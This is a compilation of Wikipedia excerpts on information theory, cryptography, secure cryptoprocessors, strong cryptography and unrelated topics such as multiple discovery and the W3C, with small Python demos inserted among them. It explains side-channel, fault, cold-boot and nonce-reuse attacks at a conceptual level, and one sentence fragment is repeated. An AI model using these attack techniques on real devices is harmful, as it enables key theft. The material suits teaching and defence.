Other important information-theoretic quantities include the Rényi entropy and the Tsallis entropy (generalizations of the concept of entropy), differential entropy (a generalization of quantities of information to continuous distributions), and the conditional mutual information. Also, pragmatic information has been proposed as a measure of how much information has been used in making a decision.

Coding theory is one of the most important and direct applications of information theory. It can be subdivided into source coding theory and channel coding theory. Using a statistical description for data, information theory quantifies the number of bits needed to describe the data, which is the information entropy of the source.

This division of coding theory into compression and transmission is justified by the information transmission theorems, or source–channel separation theorems, which justify the use of bits as the universal currency for information in many contexts. However, these theorems only hold in the situation where one transmitting user wishes to communicate to one receiving user. In scenarios with more than one transmitter (the multiple-access channel), more than one receiver (the broadcast channel) or intermediary "helpers" (the relay channel), or more general networks, compression followed by transmission may no longer be optimal.

Any process that generates successive messages can be considered a source of information. A memoryless source is one in which each message is an independent identically distributed random variable, whereas the properties of ergodicity and stationarity impose less restrictive constraints. All such sources are stochastic. These terms are well studied in their own right outside information theory.

Information rate is the average entropy per symbol.
For memoryless sources, this is merely the entropy of each symbol, while, in the case of a stationary stochastic process, it is

r = lim_{n→∞} H(X_n | X_{n−1}, X_{n−2}, X_{n−3}, ...);

that is, the conditional entropy of a symbol given all the previous symbols generated. For the more general case of a process that is not necessarily stationary, the average rate is

r = lim_{n→∞} (1/n) H(X_1, X_2, ..., X_n);

that is, the limit of the joint entropy per symbol. For stationary sources, these two expressions give the same result.[41]

The information rate between an input process and an output process is defined analogously as the limit of the mutual information per symbol.

It is common in information theory to speak of the "rate" or "entropy" of a language. This is appropriate, for example, when the source of information is English prose. The rate of a source of information is related to its redundancy and how well it can be compressed, the subject of source coding.

Communications over a channel is the primary motivation of information theory. However, channels often fail to produce an exact reconstruction of a signal; noise, periods of silence, and other forms of signal corruption often degrade quality.

Consider the communications process over a discrete channel: a transmitter sends a message X over a noisy channel, and a receiver observes Y. Here X represents the space of messages transmitted, and Y the space of messages received during a unit time over our channel. Let p(y|x) be the conditional probability distribution function of Y given X. We will consider p(y|x) to be an inherent fixed property of our communications channel (representing the nature of the noise of our channel). Then the joint distribution of X and Y is completely determined by our channel and by our choice of f(x), the marginal distribution of messages we choose to send over the channel. Under these constraints, we would like to maximize the rate of information, or the signal, we can communicate over the channel. The appropriate measure for this is the mutual information, and this maximum mutual information is called the channel capacity and is given by

C = max_{f} I(X; Y).

This capacity has the following property related to communicating at information rate R (where R is usually bits per symbol). For any information rate R < C and coding error ε > 0, for large enough N, there exists a code of length N and rate ≥ R and a decoding algorithm such that the maximal probability of block error is ≤ ε; that is, it is always possible to transmit with arbitrarily small block error. In addition, for any rate R > C, it is impossible to transmit with arbitrarily small block error.

Channel coding is concerned with finding such nearly optimal codes that can be used to transmit data over a noisy channel with a small coding error at a rate near the channel capacity.

In practice many channels have memory. Namely, at time i the channel is given by the conditional probability P(y_i | x_i, x_{i−1}, x_{i−2}, ..., x_1, y_{i−1}, y_{i−2}, ..., y_1). It is often more convenient to use the notation x^i = (x_i, x_{i−1}, x_{i−2}, ..., x_1), in which case the channel becomes P(y_i | x^i, y^{i−1}). In such a case the capacity is given by the mutual information rate when there is no feedback available, and by the directed information rate whether or not there is feedback[33][42] (if there is no feedback the directed information equals the mutual information).
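The capacity formula C = max I(X; Y) has a simple closed form for the binary symmetric channel, which flips each bit with crossover probability p: the maximizing input distribution is uniform and the capacity reduces to C = 1 − H_b(p), where H_b is the binary entropy function defined earlier. A short sketch (function names are illustrative):

```python
from math import log2

def binary_entropy(p):
    """H_b(p) = -p*log2(p) - (1-p)*log2(1-p), with H_b(0) = H_b(1) = 0."""
    if p in (0.0, 1.0):
        return 0.0
    return -p * log2(p) - (1 - p) * log2(1 - p)

def bsc_capacity(p):
    """Capacity of a binary symmetric channel with crossover probability p:
    C = 1 - H_b(p), achieved by a uniform input distribution."""
    return 1.0 - binary_entropy(p)

for p in (0.0, 0.11, 0.5):
    print(f"crossover {p:4.2f}: capacity {bsc_capacity(p):.3f} bits/use")
# crossover 0.00: capacity 1.000 bits/use  (noiseless channel)
# crossover 0.11: capacity 0.500 bits/use  (half a bit per channel use)
# crossover 0.50: capacity 0.000 bits/use  (output independent of input)
```

The p = 0.5 case illustrates the theorem's converse: when the output is independent of the input, no code of any length can achieve a positive rate with small error.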
Fungible information is the information for which the means of encoding is not important.[43] Classical information theorists and computer scientists are mainly concerned with information of this sort. It is sometimes referred to as speakable information.[44]

Information-theoretic concepts apply to cryptography and cryptanalysis. Turing's information unit, the ban, was used in the Ultra project, breaking the German Enigma machine code and hastening the end of World War II in Europe. Shannon himself defined an important concept now called the unicity distance. Based on the redundancy of the plaintext, it attempts to give a minimum amount of ciphertext necessary to ensure unique decipherability.

Information theory leads us to believe it is much more difficult to keep secrets than it might first appear. A brute force attack can break systems based on asymmetric key algorithms or on the most commonly used methods of symmetric key algorithms (sometimes called secret key algorithms), such as block ciphers. The security of all such methods comes from the assumption that no known attack can break them in a practical amount of time. Information-theoretic security refers to methods such as the one-time pad that are not vulnerable to such brute force attacks. In such cases, the positive conditional mutual information between the plaintext and ciphertext (conditioned on the key) can ensure proper transmission, while the unconditional mutual information between the plaintext and ciphertext remains zero, resulting in absolutely secure communications. In other words, an eavesdropper would not be able to improve his or her guess of the plaintext by gaining knowledge of the ciphertext but not of the key. However, as in any other cryptographic system, care must be used to correctly apply even information-theoretically secure methods; the Venona project was able to crack the one-time pads of the Soviet Union due to their improper reuse of key material.
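The unicity distance mentioned above can be estimated as U = H(K)/D, where H(K) is the entropy of the key and D is the redundancy of the plaintext per character. A minimal sketch using the textbook example of a monoalphabetic substitution cipher over English follows; the 1.5 bits-per-letter entropy figure is a common approximation assumed here, not a value taken from this article.

```python
from math import log2, factorial

def unicity_distance(key_entropy_bits, redundancy_per_char):
    """Shannon's unicity distance U = H(K) / D: the approximate amount of
    ciphertext needed before only one meaningful decryption remains."""
    return key_entropy_bits / redundancy_per_char

# Monoalphabetic substitution cipher over the 26-letter English alphabet.
key_entropy = log2(factorial(26))   # ~88.4 bits for 26! possible keys
redundancy = log2(26) - 1.5         # ~3.2 bits/char, assuming ~1.5 bits of
                                    # entropy per letter of English text
print(round(unicity_distance(key_entropy, redundancy)))  # ~28 characters
```

Under these assumptions, roughly 28 characters of ciphertext suffice in principle to pin down the key, which is why short substitution ciphers are so easily broken.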
Pseudorandom number generators are widely available in computer language libraries and application programs. They are, almost universally, unsuited to cryptographic use as they do not evade the deterministic nature of modern computer equipment and software. A class of improved random number generators is termed cryptographically secure pseudorandom number generators, but even they require random seeds external to the software to work as intended. These can be obtained via extractors, if done carefully. The measure of sufficient randomness in extractors is min-entropy, a value related to Shannon entropy through Rényi entropy; Rényi entropy is also used in evaluating randomness in cryptographic systems. Although related, the distinctions among these measures mean that a random variable with high Shannon entropy is not necessarily satisfactory for use in an extractor and so for cryptographic uses.

One early commercial application of information theory was in the field of seismic oil exploration. Work in this field made it possible to strip off and separate the unwanted noise from the desired seismic signal. Information theory and digital signal processing offer a major improvement of resolution and image clarity over previous analog methods.[45]

Semioticians Doede Nauta and Winfried Nöth both considered Charles Sanders Peirce as having created a theory of information in his works on semiotics.[46]: 171 [47]: 137 Nauta defined semiotic information theory as the study of "the internal processes of coding, filtering, and information processing."[46]: 91

Concepts from information theory such as redundancy and code control have been used by semioticians such as Umberto Eco and Ferruccio Rossi-Landi to explain ideology as a form of message transmission whereby a dominant social class emits its message by using signs that exhibit a high degree of redundancy such that only one message is decoded among a selection of competing ones.[48]

Quantitative information-theoretic methods have been applied in cognitive science to analyze the integrated process organization of neural information in the context of the binding problem in cognitive neuroscience.[49] In this context, researchers define either an information-theoretical measure, such as functional clusters (Gerald Edelman and Giulio Tononi's functional clustering model and dynamic core hypothesis (DCH)[50]) or effective information (Tononi's integrated information theory (IIT) of consciousness[51][52][53]), on the basis of a reentrant process organization, i.e. the synchronization of neurophysiological activity between groups of neuronal populations; or they use measures based on the minimization of free energy and statistical methods, as in Karl J. Friston's free energy principle (FEP), an information-theoretical approach which states that every adaptive change in a self-organized system leads to a minimization of free energy, and the Bayesian brain hypothesis.[54][55][56][57][58]

Information theory also has applications in the search for extraterrestrial intelligence,[59] black holes,[60] bioinformatics,[61] and gambling.[62][63]
https://en.wikipedia.org/wiki/Information_theory
The following outline is provided as an overview of and topical guide to cryptography:

Cryptography (or cryptology) – the practice and study of hiding information. Modern cryptography intersects the disciplines of mathematics, computer science, and engineering. Applications of cryptography include ATM cards, computer passwords, and electronic commerce.

List of cryptographers
https://en.wikipedia.org/wiki/Outline_of_cryptography
This is a list of cryptographers. Cryptography is the practice and study of techniques for secure communication in the presence of third parties called adversaries. See also Category:Modern cryptographers for a more exhaustive list.
https://en.wikipedia.org/wiki/List_of_cryptographers
Historians and sociologists have remarked on the occurrence, in science, of "multiple independent discovery". Robert K. Merton defined such "multiples" as instances in which similar discoveries are made by scientists working independently of each other.[1] "Sometimes", writes Merton, "the discoveries are simultaneous or almost so; sometimes a scientist will make a new discovery which, unknown to him, somebody else has made years before."[2]

Commonly cited examples of multiple independent discovery are the 17th-century independent formulation of calculus by Isaac Newton and Gottfried Wilhelm Leibniz;[3][4] the 18th-century discovery of oxygen by Carl Wilhelm Scheele, Joseph Priestley, Antoine Lavoisier and others; and the theory of the evolution of species, independently advanced in the 19th century by Charles Darwin and Alfred Russel Wallace.

Multiple independent discovery, however, is not limited to such famous historic instances. Merton believed that it is multiple discoveries, rather than unique ones, that represent the common pattern in science.[5]

Merton contrasted a "multiple" with a "singleton", a discovery that has been made uniquely by a single scientist or group of scientists working together.[6] The distinction may blur as science becomes increasingly collaborative.[7]

A distinction is drawn between a discovery and an invention, as discussed for example by Bolesław Prus.[8] However, discoveries and inventions are inextricably related, in that discoveries lead to inventions, and inventions facilitate discoveries; and since the same phenomenon of multiplicity occurs in relation to both discoveries and inventions, this article lists both multiple discoveries and multiple inventions.

"When the time is ripe for certain things, these things appear in different places in the manner of violets coming to light in early spring."

"[Y]ou do not [make a discovery] until a background knowledge is built up to a place where it's almost impossible not to see the new thing, and it often happens that the new step is done contemporaneously in two different places in the world, independently."

"[A] man can no more be completely original ... than a tree can grow out of air."

"I never had an idea in my life. My so-called inventions already existed in the environment – I took them out. I've created nothing. Nobody does. There's no such thing as an idea being brain-born; everything comes from the outside."
https://en.wikipedia.org/wiki/List_of_multiple_discoveries#20th_century
In cryptography, a pre-shared key (PSK) is a shared secret which was previously exchanged between the two parties over a secure channel before it needs to be used.[1]

To build a key from a shared secret, a key derivation function is typically used. Such systems almost always use symmetric key cryptographic algorithms. The term PSK is used in Wi-Fi encryption such as Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA), where the method is called WPA-PSK or WPA2-PSK, and also in the Extensible Authentication Protocol (EAP), where it is known as EAP-PSK. In all these cases, both the wireless access points (AP) and all clients share the same key.[2]

The characteristics of this secret or key are determined by the system which uses it; some system designs require that such keys be in a particular format. It can be a password, a passphrase, or a hexadecimal string. The secret is used by all systems involved in the cryptographic processes used to secure the traffic between the systems.

Crypto systems rely on one or more keys for confidentiality. One particular attack is always possible against keys, the brute force key space search attack. A sufficiently long, randomly chosen key can resist any practical brute force attack, though not in principle if an attacker has sufficient computational power (see password strength and password cracking for more discussion). Unavoidably, however, pre-shared keys are held by both parties to the communication, and so can be compromised at one end without the knowledge of anyone at the other. There are several tools available to help one choose strong passwords, though doing so over any network connection is inherently unsafe as one cannot in general know who, if anyone, may be eavesdropping on the interaction. Choosing keys used by cryptographic algorithms is somewhat different in that any pattern whatsoever should be avoided, as any such pattern may provide an attacker with a lower-effort attack than brute force search. This implies random key choice to force attackers to spend as much effort as possible; this is very difficult both in principle and in practice. As a general rule, any software except a cryptographically secure pseudorandom number generator (CSPRNG) should be avoided.
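As a concrete example of building a key from a pre-shared secret, WPA2-PSK stretches the passphrase with PBKDF2 (HMAC-SHA1, with the network's SSID as salt and 4096 iterations) into a 256-bit pairwise master key, per IEEE 802.11i. A minimal sketch using Python's standard library; the passphrase and SSID shown are placeholders.

```python
import hashlib

def wpa2_psk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit pairwise master key used by WPA2-PSK.

    The passphrase is stretched with PBKDF2-HMAC-SHA1, using the
    network's SSID as the salt and 4096 iterations, as specified
    by IEEE 802.11i.
    """
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("utf-8"),
        ssid.encode("utf-8"),
        4096,       # iteration count fixed by the standard
        dklen=32,   # 256-bit derived key
    )

# Example with an illustrative passphrase and SSID:
pmk = wpa2_psk("correct horse battery staple", "HomeNetwork")
print(pmk.hex())
```

Note how the SSID-as-salt design means the same passphrase yields different keys on different networks, which blunts precomputed dictionary attacks across networks, though a weak passphrase remains vulnerable to a targeted dictionary attack.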
https://en.wikipedia.org/wiki/Pre-shared_key
A secure cryptoprocessor is a dedicated computer-on-a-chip or microprocessor for carrying out cryptographic operations, embedded in a packaging with multiple physical security measures, which give it a degree of tamper resistance. Unlike cryptographic processors that output decrypted data onto a bus in a secure environment, a secure cryptoprocessor does not output decrypted data or decrypted program instructions in an environment where security cannot always be maintained.

The purpose of a secure cryptoprocessor is to act as the keystone of a security subsystem, eliminating the need to protect the rest of the subsystem with physical security measures.[1]

A hardware security module (HSM) contains one or more secure cryptoprocessor chips.[2][3][4] These devices are high-grade secure cryptoprocessors used with enterprise servers. A hardware security module can have multiple levels of physical security, with a single-chip cryptoprocessor as its most secure component. The cryptoprocessor does not reveal keys or executable instructions on a bus, except in encrypted form, and zeroes keys upon attempts at probing or scanning. The crypto chip(s) may also be potted in the hardware security module with other processors and memory chips that store and process encrypted data. Any attempt to remove the potting will cause the keys in the crypto chip to be zeroed. A hardware security module may also be part of a computer (for example an ATM) that operates inside a locked safe to deter theft, substitution, and tampering.

Modern smartcards are probably the most widely deployed form of secure cryptoprocessor, although more complex and versatile secure cryptoprocessors are widely deployed in systems such as automated teller machines, TV set-top boxes, military applications, and high-security portable communication equipment.[citation needed] Some secure cryptoprocessors can even run general-purpose operating systems such as Linux inside their security boundary.

Cryptoprocessors input program instructions in encrypted form and decrypt the instructions to plain instructions, which are then executed within the same cryptoprocessor chip where the decrypted instructions are inaccessibly stored. By never revealing the decrypted program instructions, the cryptoprocessor prevents tampering of programs by technicians who may have legitimate access to the sub-system data bus. This is known as bus encryption. Data processed by a cryptoprocessor is also frequently encrypted.

The Trusted Platform Module (TPM) is an implementation of a secure cryptoprocessor that brings the notion of trusted computing to ordinary PCs by enabling a secure environment.[citation needed] Present TPM implementations focus on providing a tamper-proof boot environment, and persistent and volatile storage encryption.

Security chips for embedded systems are also available that provide the same level of physical protection for keys and other secret material as a smartcard processor or TPM, but in a smaller, less complex and less expensive package.[citation needed] They are often referred to as cryptographic authentication devices and are used to authenticate peripherals, accessories and/or consumables. Like TPMs, they are usually turnkey integrated circuits intended to be embedded in a system, usually soldered to a PC board.

Security measures used in secure cryptoprocessors include tamper-detecting and tamper-evident containment, conductive shield layers that prevent the reading of internal signals, controlled execution to keep timing from revealing secret information, and automatic zeroization of secrets in the event of tampering.

Secure cryptoprocessors, while useful, are not invulnerable to attack, particularly for well-equipped and determined opponents (e.g. a government intelligence agency) who are willing to expend enough resources on the project.[5][6]
a government intelligence agency) who are willing to expend enough resources on the project.[5][6]

One attack on a secure cryptoprocessor targeted the IBM 4758.[7] A team at the University of Cambridge reported the successful extraction of secret information from an IBM 4758, using a combination of mathematics and special-purpose codebreaking hardware. However, this attack was not practical in real-world systems because it required the attacker to have full access to all API functions of the device. Normal and recommended practice uses the integral access control system to split authority so that no one person could mount the attack.

While the vulnerability they exploited was a flaw in the software loaded on the 4758, and not the architecture of the 4758 itself, their attack serves as a reminder that a security system is only as secure as its weakest link: the strong link of the 4758 hardware was rendered useless by flaws in the design and specification of the software loaded on it.

Smartcards are significantly more vulnerable, as they are more open to physical attack. Additionally, hardware backdoors can undermine security in smartcards and other cryptoprocessors unless investment is made in anti-backdoor design methods.[8]

In the case of full disk encryption applications, especially when implemented without a boot PIN, a cryptoprocessor would not be secure against a cold boot attack[9] if data remanence could be exploited to dump memory contents after the operating system has retrieved the cryptographic keys from its TPM. However, if all of the sensitive data is stored only in cryptoprocessor memory and not in external storage, and the cryptoprocessor is designed to be unable to reveal keys or decrypted or unencrypted data on chip bonding pads or solder bumps, then such protected data would be accessible only by probing the cryptoprocessor chip after removing any packaging and metal shielding layers from the chip. This would require both physical possession of the device and skills and equipment beyond those of most technical personnel.

Other attack methods involve carefully analyzing the timing of various operations that might vary depending on the secret value, or mapping the current consumption versus time to identify differences in the way that '0' bits are handled internally versus '1' bits. Alternatively, the attacker may apply temperature extremes, excessively high or low clock frequencies, or a supply voltage that exceeds the specifications in order to induce a fault. The internal design of the cryptoprocessor can be tailored to prevent these attacks.

Some secure cryptoprocessors contain dual processor cores and generate inaccessible encryption keys when needed, so that even if the circuitry is reverse engineered, it will not reveal any keys that are necessary to securely decrypt software booted from encrypted flash memory or communicated between cores.[10]

The first single-chip cryptoprocessor design was for copy protection of personal computer software (see US Patent 4,168,396, Sept 18, 1979) and was inspired by Bill Gates's Open Letter to Hobbyists. The hardware security module (HSM), a type of secure cryptoprocessor,[3][4] was invented by Egyptian-American engineer Mohamed M. 
Atalla[11] in 1972.[12] He invented a high-security module dubbed the "Atalla Box" which encrypted PIN and ATM messages, and protected offline devices with an un-guessable PIN-generating key.[13] In 1972, he filed a patent for the device.[14] He founded Atalla Corporation (now Utimaco Atalla) that year,[12] and commercialized the "Atalla Box" the following year,[13] officially as the Identikey system.[15] It was a card reader and customer identification system, consisting of a card reader console, two customer PIN pads, an intelligent controller and a built-in electronic interface package.[15] It allowed the customer to type in a secret code, which was transformed by the device, using a microprocessor, into another code for the teller.[16] During a transaction, the customer's account number was read by the card reader.[15] It was a success, and led to the wide use of high-security modules.[13]

Fearful that Atalla would dominate the market, banks and credit card companies began working on an international standard in the 1970s.[13] The IBM 3624, launched in the late 1970s, adopted a similar PIN verification process to the earlier Atalla system.[17] Atalla was an early competitor to IBM in the banking security market.[14][18]

At the National Association of Mutual Savings Banks (NAMSB) conference in January 1976, Atalla unveiled an upgrade to its Identikey system, called the Interchange Identikey. It added the capability of processing online transactions and dealing with network security. Designed with the focus of taking bank transactions online, the Identikey system was extended to shared-facility operations. It was consistent and compatible with various switching networks, and was capable of resetting itself electronically to any one of 64,000 irreversible nonlinear algorithms as directed by card data information. The Interchange Identikey device was released in March 1976.[16] Later, in 1979, Atalla introduced the first network security processor (NSP).[19] Atalla's HSM products protected 250 million card transactions every day as of 2013,[12] and secured the majority of the world's ATM transactions as of 2014.[11]
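The timing-analysis attacks described above apply to software as well as hardware: a comparison routine that returns as soon as the first byte differs leaks, through its running time, how much of a secret value an attacker has guessed correctly. A minimal Python sketch of the standard mitigation, a constant-time comparison, follows; in practice one would simply call the standard library's hmac.compare_digest rather than hand-rolling the loop.

    import hmac

    def naive_equal(a: bytes, b: bytes) -> bool:
        # Leaks timing: returns at the first mismatching byte.
        if len(a) != len(b):
            return False
        for x, y in zip(a, b):
            if x != y:
                return False
        return True

    def constant_time_equal(a: bytes, b: bytes) -> bool:
        # Examines every byte regardless of where mismatches occur.
        if len(a) != len(b):
            return False
        diff = 0
        for x, y in zip(a, b):
            diff |= x ^ y
        return diff == 0

    # Preferred in real code: the standard library's constant-time comparison.
    assert hmac.compare_digest(b"secret-tag", b"secret-tag")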
https://en.wikipedia.org/wiki/Secure_cryptoprocessor
Strong cryptography or cryptographically strong are general terms used to designate cryptographic algorithms that, when used correctly, provide a very high (usually insurmountable) level of protection against any eavesdropper, including government agencies.[1] There is no precise definition of the boundary line between strong cryptography and (breakable) weak cryptography, as this border constantly shifts due to improvements in hardware and cryptanalysis techniques.[2] These improvements eventually place the capabilities once available only to the NSA within the reach of a skilled individual,[3] so in practice there are only two levels of cryptographic security, "cryptography that will stop your kid sister from reading your files, and cryptography that will stop major governments from reading your files" (Bruce Schneier).[2]

Strong cryptography algorithms have high security strength, for practical purposes usually defined as the number of bits in the key. For example, the United States government, when dealing with export control of encryption, considered as of 1999 any implementation of a symmetric encryption algorithm with a key length above 56 bits, or its public key equivalent,[4] to be strong and thus potentially subject to export licensing.[5] To be strong, an algorithm needs to have a sufficiently long key and be free of known mathematical weaknesses, as exploitation of these effectively reduces the key size. At the beginning of the 21st century, the typical security strength of strong symmetric encryption algorithms is 128 bits (slightly lower values can still be strong, but usually there is little technical gain in using smaller key sizes).[5]

Demonstrating the resistance of any cryptographic scheme to attack is a complex matter, requiring extensive testing and reviews, preferably in a public forum. Good algorithms and protocols are required (similarly, good materials are required to construct a strong building), but good system design and implementation are needed as well: "it is possible to build a cryptographically weak system using strong algorithms and protocols" (just as the use of good materials in construction does not guarantee a solid structure). 
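To give a sense of what "sufficiently long key" means against brute-force search, the following back-of-the-envelope Python calculation estimates the expected time to search a 128-bit key space. The guess rate of 10^12 keys per second is an arbitrary illustrative figure, not a measured capability of any real attacker.

    SECONDS_PER_YEAR = 365.25 * 24 * 3600
    guesses_per_second = 1e12          # assumed attacker throughput (illustrative)

    keyspace = 2 ** 128                # number of possible 128-bit keys
    expected_tries = keyspace / 2      # on average, half the space is searched
    years = expected_tries / guesses_per_second / SECONDS_PER_YEAR
    print(f"{years:.2e} years")        # on the order of 5e18 years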
Many real-life systems turn out to be weak when strong cryptography is not used properly, for example when random nonces are reused.[6] A successful attack might not even involve the algorithm at all; for example, if the key is generated from a password, guessing a weak password is easy and does not depend on the strength of the cryptographic primitives.[7] A user can become the weakest link in the overall picture, for example, by sharing passwords and hardware tokens with colleagues.[8]

The level of expense required for strong cryptography originally restricted its use to government and military agencies.[9] Until the middle of the 20th century, the process of encryption required a great deal of human labor, and errors (which prevented decryption) were very common, so only a small share of written information could be encrypted.[10] The US government, in particular, was able to keep a monopoly on the development and use of cryptography in the US into the 1960s.[11] In the 1970s, the increased availability of powerful computers and unclassified research breakthroughs (the Data Encryption Standard, and the Diffie-Hellman and RSA algorithms) made strong cryptography available for civilian use.[12] The mid-1990s saw the worldwide proliferation of knowledge and tools for strong cryptography.[12] By the 21st century the technical limitations were gone, although the majority of communications were still unencrypted.[10] At the same time, the cost of building and running systems with strong cryptography became roughly the same as that for weak cryptography.[13]

The use of computers changed the process of cryptanalysis, famously with Bletchley Park's Colossus. But just as the development of digital computers and electronics helped in cryptanalysis, it also made possible much more complex ciphers. It is typically the case that use of a quality cipher is very efficient, while breaking it requires an effort many orders of magnitude larger, making cryptanalysis so inefficient and impractical as to be effectively impossible.

The term "cryptographically strong" is often used to describe an encryption algorithm, and implies, in comparison to some other algorithm (which is thus cryptographically weak), greater resistance to attack. But it can also be used to describe hashing and unique identifier and filename creation algorithms. See for example the description of the Microsoft .NET runtime library function Path.GetRandomFileName.[14] In this usage, the term means "difficult to guess".

An encryption algorithm is intended to be unbreakable (in which case it is as strong as it can ever be), but might be breakable (in which case it is as weak as it can ever be), so there is not, in principle, a continuum of strength as the idiom would seem to imply: Algorithm A is stronger than Algorithm B which is stronger than Algorithm C, and so on. The situation is made more complex, and less subsumable into a single strength metric, by the fact that there are many types of cryptanalytic attack and that any given algorithm is likely to force the attacker to do more work to break it when using one attack than another. There is only one known unbreakable cryptographic system, the one-time pad, which is not generally possible to use because of the difficulties involved in exchanging one-time pads without their being compromised. So any encryption algorithm can be compared to the perfect algorithm, the one-time pad. 
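The nonce-reuse failure mentioned above can be demonstrated in a few lines. The toy stream cipher below (a keystream derived by hashing the key and nonce; purely illustrative, not a real cipher) shows that when the same key and nonce are reused for two messages, XORing the two ciphertexts cancels the keystream and reveals the XOR of the plaintexts without any knowledge of the key.

    import hashlib

    def toy_keystream(key: bytes, nonce: bytes, length: int) -> bytes:
        # Illustrative keystream only: expand SHA-256(key || nonce || counter).
        out = b""
        counter = 0
        while len(out) < length:
            out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
            counter += 1
        return out[:length]

    def xor(a: bytes, b: bytes) -> bytes:
        return bytes(x ^ y for x, y in zip(a, b))

    key, nonce = b"k" * 16, b"n" * 12
    p1, p2 = b"attack at dawn!!", b"retreat at noon!"
    c1 = xor(p1, toy_keystream(key, nonce, len(p1)))
    c2 = xor(p2, toy_keystream(key, nonce, len(p2)))   # nonce reused: mistake
    # The keystream cancels; an eavesdropper learns p1 XOR p2 without the key.
    assert xor(c1, c2) == xor(p1, p2)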
The usual sense in which this term is (loosely) used is in reference to a particular attack, brute-force key search, especially in explanations for newcomers to the field. Indeed, with this attack (always assuming keys to have been randomly chosen), there is a continuum of resistance depending on the length of the key used. But even so there are two major problems: many algorithms allow use of different length keys at different times, and any algorithm can forgo use of the full key length possible. Thus, Blowfish and RC5 are block cipher algorithms whose design specifically allowed for several key lengths, and which cannot therefore be said to have any particular strength with respect to brute-force key search. Furthermore, US export regulations restrict key length for exportable cryptographic products, and in several cases in the 1980s and 1990s (e.g., famously in the case of Lotus Notes' export approval) only partial keys were used, decreasing 'strength' against brute-force attack for those (export) versions. More or less the same thing happened outside the US as well, as for example in the case of more than one of the cryptographic algorithms in the GSM cellular telephone standard.

The term is commonly used to convey that some algorithm is suitable for some task in cryptography or information security, but also resists cryptanalysis and has no, or fewer, security weaknesses; the tasks in question are varied. Cryptographically strong would seem to mean that the described method has some kind of maturity, perhaps even approval for use against different kinds of systematic attacks in theory and/or practice; indeed, that the method may resist those attacks long enough to protect the information carried (and what stands behind the information) for a useful length of time. But due to the complexity and subtlety of the field, neither is almost ever the case. Since such assurances are not actually available in real practice, sleight of hand in language which implies that they are will generally be misleading.

There will always be uncertainty as advances (e.g., in cryptanalytic theory or merely affordable computer capacity) may reduce the effort needed to successfully use some attack method against an algorithm. In addition, actual use of cryptographic algorithms requires their encapsulation in a cryptosystem, and doing so often introduces vulnerabilities which are not due to faults in an algorithm. For example, essentially all algorithms require random choice of keys, and any cryptosystem which does not provide such keys will be subject to attack regardless of any attack-resistant qualities of the encryption algorithm(s) used. 
Widespread use of encryption increases the costs of surveillance, so government policies aim to regulate the use of strong cryptography.[15] In the 2000s, the effect of encryption on surveillance capabilities was limited by the ever-increasing share of communications going through the global social media platforms, which did not use strong encryption and provided governments with the requested data.[16] Murphy describes a legislative balance that needs to be struck: government powers broad enough to be able to follow the quickly evolving technology, yet sufficiently narrow for the public and overseeing agencies to understand the future use of the legislation.[17]

The initial response of the US government to the expanded availability of cryptography was to treat cryptographic research the same way atomic energy research is treated, i.e., "born classified", with the government exercising legal control over the dissemination of research results. This was quickly found to be impossible, and the efforts switched to control over deployment (export, as a prohibition on the deployment of cryptography within the US was not seriously considered).[18]

Export control in the US historically uses two tracks: the munitions list and the dual-use list.[19] Since the original applications of cryptography were almost exclusively military, it was placed on the munitions list. With the growth of civilian uses, dual-use cryptography was defined by cryptographic strength, with strong encryption remaining a munition in a similar way to guns (small arms are dual-use while artillery is of purely military value).[20] This classification had its obvious drawbacks: a major bank is arguably just as systemically important as a military installation,[20] and restrictions on publishing strong cryptography code ran up against the First Amendment, so after experimenting in 1993 with the Clipper chip (where the US government kept special decryption keys in escrow), in 1996 almost all cryptographic items were transferred to the Department of Commerce.[21]

The position of the EU, in comparison to the US, has always tilted more towards privacy. In particular, the EU rejected the key escrow idea as early as 1997. The European Union Agency for Cybersecurity (ENISA) holds the opinion that backdoors are not efficient for legitimate surveillance, yet pose great danger to general digital security.[15]

The Five Eyes (post-Brexit) represent a group of states with similar views on the issues of security and privacy. The group might have enough heft to drive the global agenda on lawful interception. Its efforts are not entirely coordinated: for example, the 2019 demand for Facebook not to implement end-to-end encryption was not supported by either Canada or New Zealand, and did not result in a regulation.[17]

In the 1990s, the president and government of Russia issued several decrees formally banning uncertified cryptosystems from use by government agencies. 
A presidential decree of 1995 also attempted to ban individuals from producing and selling cryptography systems without an appropriate license, but it was not enforced in any way, as it was suspected to contradict the Russian Constitution of 1993 and was not a law per se.[22][23][24][note 1] Decree No. 313, issued in 2012, further amended the previous ones, allowing products with embedded cryptosystems to be produced and distributed without requiring a license as such, even though it declares some restrictions.[25][26] France had quite strict regulations in this field, but has relaxed them in recent years.

Examples that are not considered cryptographically strong include the deliberately key-shortened export cipher variants and the GSM cipher algorithms discussed above.
https://en.wikipedia.org/wiki/Strong_cryptography
Syllabical and Steganographical Table (French: Tableau syllabique et stéganographique) is an eighteenth-century cryptographical work by P. R. Wouves. Published by Benjamin Franklin Bache in 1797, it provided a method for representing pairs of letters by numbers. It may have been the first chart for cryptographic purposes to have been printed in the United States.[1][2]
https://en.wikipedia.org/wiki/Syllabical_and_Steganographical_Table
The World Wide Web Consortium (W3C) is the main international standards organization for the World Wide Web. Founded in 1994 by Tim Berners-Lee, the consortium is made up of member organizations that maintain full-time staff working together in the development of standards for the World Wide Web. As of May 2025, W3C has 350 members.[3] The organization has been led by CEO Seth Dobbs since October 2023.[4] W3C also engages in education and outreach, develops software and serves as an open forum for discussion about the Web.

The World Wide Web Consortium (W3C) was founded in 1994 by Tim Berners-Lee after he left the European Organization for Nuclear Research (CERN) in October 1994.[5] It was founded at the Massachusetts Institute of Technology (MIT) Laboratory for Computer Science with support from the European Commission and the Defense Advanced Research Projects Agency, which had pioneered the ARPANET, the most direct predecessor to the modern Internet.[6] It was located in Technology Square until 2004, when it moved, with the MIT Computer Science and Artificial Intelligence Laboratory, to the Stata Center.[7]

The organization tries to foster compatibility and agreement among industry members in the adoption of new standards defined by the W3C. Incompatible versions of HTML are offered by different vendors, causing inconsistency in how web pages are displayed. The consortium tries to get all those vendors to implement a set of core principles and components that are chosen by the consortium.

